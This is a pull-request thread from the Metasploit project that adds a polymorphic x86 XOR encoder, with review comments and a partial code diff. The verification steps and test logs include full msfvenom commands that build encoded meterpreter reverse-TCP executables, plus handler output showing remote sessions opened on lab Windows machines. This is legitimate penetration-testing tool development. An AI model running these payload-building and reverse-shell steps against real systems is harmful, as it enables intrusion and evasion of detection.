### PR TITLE
Add encoder module x86/xor_poly at path modules/encoder/x86/xor_poly.rb, Rubocop clean, msftidy clean

### PR DESCRIPTION
**Pull request by araout42**
Add encoder module `x86/xor_poly` at path `modules/encoder/x86/xor_poly.rb`, Rubocop clean, msftidy clean

it has 100% polymorphism, all the bytes changes from a generation to another  
image

probably should be ranked as excellent since it has many many permutations for badchars

## Verification
List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/handler`
- [x] `set lhost 127.0.0.1`
- [x] `set payload linux/x86/meterpreter/reverse_tcp`
- [x] `exploit`   *expected : Started listener ...*
- [x] Run `./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.01 LPORT=4444 -f elf -e x86/xor_poly -b "\x00\x90"  > /tmp/Test && chmod +x /tmp/Test`
- [x] `/tmp/test` *expected Connect to listener and give meterpreter session as in the video*

https://user-images.githubusercontent.com/41875074/208701818-d7d84951-e818-40a7-ad23-51919b9cf3e8.mov

### CODE REVIEW

**Comment by gwillcox-r7** [comment]
Updated PR description to make things easier to read.

**Comment by araout42** [comment]
After some testing, the same code cannot be used for x64, since it need a little bit of tweaking with instructions size and the register permutations.
I will do a separate almost identical code for x64 version that i will most likely commit in another pr since it will me another modules

**Comment by sempervictus** [comment]
@araout42 - thank you sir, encoders are long-lived tools in the satchel so the more working ones we have, the merrier.

**Comment by araout42** [comment]
First, You are right, i did change the name from `xor` to `xor_poly` after a recomendation i recieved  (I edited my first message to reflect this change in the verification step )

The second is that  it cannot find a proper permutation without badchar `0x58 ; 0x59`
 the reason to that is because i added the preserve register functionnality afterward and it require the opcodes `0x58 0x59`
 
 `push eax -> 0x58`

 the error message is given by  the encoder and says that no permutation has been found with this badchar set
 
 so it is working properly
 
 But I can implement another polymorphism routine to be able to handle these badchars aswell ^^

**Comment by bwatters-r7** [comment]
Sweet; thanks, @araout42.  I appreciate the quick answer!  If I can't get it to work in the example and default setting, I usually assume there's a setup step or something else that I've missed.  In this case, given the changing feature set, it makes sense the old example did not work.

**Comment by araout42** [comment]
> Sweet; thanks, @araout42. I appreciate the quick answer! If I can't get it to work in the example and default setting, I usually assume there's a setup step or something else that I've missed. In this case, given the changing feature set, it makes sense the old example ~did not work~ worked properly in an unanticipated way.

No problem and thank you

Well i'd be happy to implement this minor change you'v mentionned earlyer :)

**Comment by bwatters-r7** [comment]
It was a minor thing I noticed, but I wanted to get everything working and do a deeper dive to make sure that there was nothing else I saw.  I don't want to keep asking you to change things, so I'll try and get all the requested changes to you all at once.  We appreciate your time and don't want to waste it!

**Comment by bwatters-r7** [comment]
## Creating payload
```
[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.5.135.201 LPORT=4585 -f exe -e x86/xor_poly -i 20 -b "\x00\x90" -o revtcpx86_xor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/xor_poly
x86/xor_poly succeeded with size 403 (iteration=0)
x86/xor_poly succeeded with size 453 (iteration=1)
x86/xor_poly succeeded with size 505 (iteration=2)
x86/xor_poly succeeded with size 557 (iteration=3)
x86/xor_poly succeeded with size 609 (iteration=4)
x86/xor_poly succeeded with size 659 (iteration=5)
x86/xor_poly succeeded with size 709 (iteration=6)
x86/xor_poly succeeded with size 759 (iteration=7)
x86/xor_poly succeeded with size 808 (iteration=8)
x86/xor_poly succeeded with size 856 (iteration=9)
x86/xor_poly succeeded with size 904 (iteration=10)
x86/xor_poly succeeded with size 953 (iteration=11)
x86/xor_poly succeeded with size 1003 (iteration=12)
x86/xor_poly succeeded with size 1054 (iteration=13)
x86/xor_poly succeeded with size 1105 (iteration=14)
x86/xor_poly succeeded with size 1156 (iteration=15)
x86/xor_poly succeeded with size 1203 (iteration=16)
x86/xor_poly succeeded with size 1251 (iteration=17)
x86/xor_poly succeeded with size 1301 (iteration=18)
x86/xor_poly succeeded with size 1353 (iteration=19)
x86/xor_poly chosen with final size 1353
Payload size: 1353 bytes
Final size of exe file: 73802 bytes
Saved as: revtcpx86_xor.exe

```

## Getting callback
```
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(multi/handler) > set lport 4585
lport => 4585
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Sending stage (175686 bytes) to 10.5.134.191
[*] Meterpreter session 1 opened (10.5.135.201:4585 -> 10.5.134.191:50164) at 2023-03-01 13:47:44 -0600

meterpreter > sysinfo
Computer        : WIN10X86-1511
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

```

**Comment by bwatters-r7** [comment]
Quick and dirty testing....
## The raw unencoded payload has nulls and nops
image

## The encoded version also has nulls and nops
image
image

## Encoded version with bad chars flagged does not contain the bad chars
image
image

File: modules/encoders/x86/xor_poly.rb [hunk 1]
```diff
@@ -0,0 +1,197 @@
...
+    table = table.shuffle
+    for i in 0..table.length - 1
+      if table[i].count(state.badchars).zero?
+        return table[i]
+      end
+    end
+    raise 'No permutation found for the badchar set :' + state.badchars.inspect
+  end
+
+  # generate instruciton for a push
```
Comment (bwatters-r7) [inline modules/encoders/x86/xor_poly.rb:41]:
```suggestion
  # generate instruction for a push
```

**Review by bwatters-r7 — COMMENTED** [review]
So it turns out the minor thing I was going to have you fix was actually right, and I just misread it.  Another reason to make sure I get it working before I suggest a fix 😆.
The only thing I see is this minor typo.

**Comment by araout42** [comment]
Thank you, well it seems perfect
I will read all the code tomorrow of the day after 
And I also have few other modification to do in the comments, I am not sure if we keep the comments in the code

**Comment by bwatters-r7** [comment]
I would definitely leave the comments, especially with something this complex.

**Comment by araout42** [comment]
Well I've reread everything, and made slight changes with the comments.
So everything is Ok on my side 

I am not sure what happened with the commit https://github.com/rapid7/metasploit-framework/pull/17401/commits/1461f9fb0372a64ac6e932e3f2c4598f3ed53ef4

but the files ```lib/metasploit/framework/compiler/headers/base.rb``` and ```lib/metasploit/framework/compiler/utils.rb```

got modified, i might had run msftidy onto them

**Comment by bwatters-r7** [comment]
Create payload
```
[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.5.135.201 LPORT=4585 -f exe -e x86/xor_poly -b "\x00\x90" -i 20 -o revtcpx86_xor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/xor_poly
x86/xor_poly succeeded with size 405 (iteration=0)
x86/xor_poly succeeded with size 458 (iteration=1)
x86/xor_poly succeeded with size 509 (iteration=2)
x86/xor_poly succeeded with size 561 (iteration=3)
x86/xor_poly succeeded with size 612 (iteration=4)
x86/xor_poly succeeded with size 661 (iteration=5)
x86/xor_poly succeeded with size 711 (iteration=6)
x86/xor_poly succeeded with size 759 (iteration=7)
x86/xor_poly succeeded with size 809 (iteration=8)
x86/xor_poly succeeded with size 860 (iteration=9)
x86/xor_poly succeeded with size 907 (iteration=10)
x86/xor_poly succeeded with size 955 (iteration=11)
x86/xor_poly succeeded with size 1005 (iteration=12)
x86/xor_poly succeeded with size 1057 (iteration=13)
x86/xor_poly succeeded with size 1108 (iteration=14)
x86/xor_poly succeeded with size 1156 (iteration=15)
x86/xor_poly succeeded with size 1204 (iteration=16)
x86/xor_poly succeeded with size 1253 (iteration=17)
x86/xor_poly succeeded with size 1303 (iteration=18)
x86/xor_poly succeeded with size 1352 (iteration=19)
x86/xor_poly chosen with final size 1352
Payload size: 1352 bytes
Final size of exe file: 73802 bytes
Saved as: revtcpx86_xor.exe

```

Collect Shell:
```
msf6 exploit(multi/handler) > use payload/windows/meterpreter/reverse_tcp
msf6 payload(windows/meterpreter/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(windows/meterpreter/reverse_tcp) > set lport 4585
lport => 4585
msf6 payload(windows/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

msf6 payload(windows/meterpreter/reverse_tcp) > [*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Sending stage (175686 bytes) to 10.5.134.199
[*] Meterpreter session 1 opened (10.5.135.201:4585 -> 10.5.134.199:49875) at 2023-03-20 17:43:51 -0500

msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10X86_1803
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

```

**Comment by bwatters-r7** [comment]
# Release Notes
This PR adds a new x86 XOR polymorphic encoder.

**Pull request merged**